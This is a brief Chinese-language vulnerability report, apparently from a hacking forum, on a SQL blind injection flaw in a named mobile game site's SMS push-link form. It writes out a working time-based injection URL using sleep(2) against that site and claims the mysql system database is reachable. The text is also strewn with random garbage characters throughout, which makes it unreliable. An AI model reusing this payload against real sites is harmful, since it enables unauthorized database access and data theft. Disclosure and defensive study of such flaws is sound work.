简要描述:
, V/ @' Q& _! K. ?" ?2 S/ F凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。- C; l! D; Q, ]9 P' ^$ Q( m
9 e" P+ Y4 M" ~ _' V2 L详细说明:
3 e3 O) H) f) l, g2 R% p+ Y存在SQL盲注url:) q, G: C$ s5 T7 n! \4 {3 W
fenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=1
1 A- E' X9 w% r( n' ^( S5 ]6 [2 Dhttp://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png2 ?, `& ?! C! G7 n. z
http://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png
/ W0 t- }' E: R7 J" h xhttp://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg
7 p. Q2 O8 R2 g" \' k* K1 y
; r# V! G" o- j1 ?7 c能看到mysql系统数据库,看来user权限应该很高的。。 | 
发表于 2013-4-4 17:34:29
收藏
支持
反对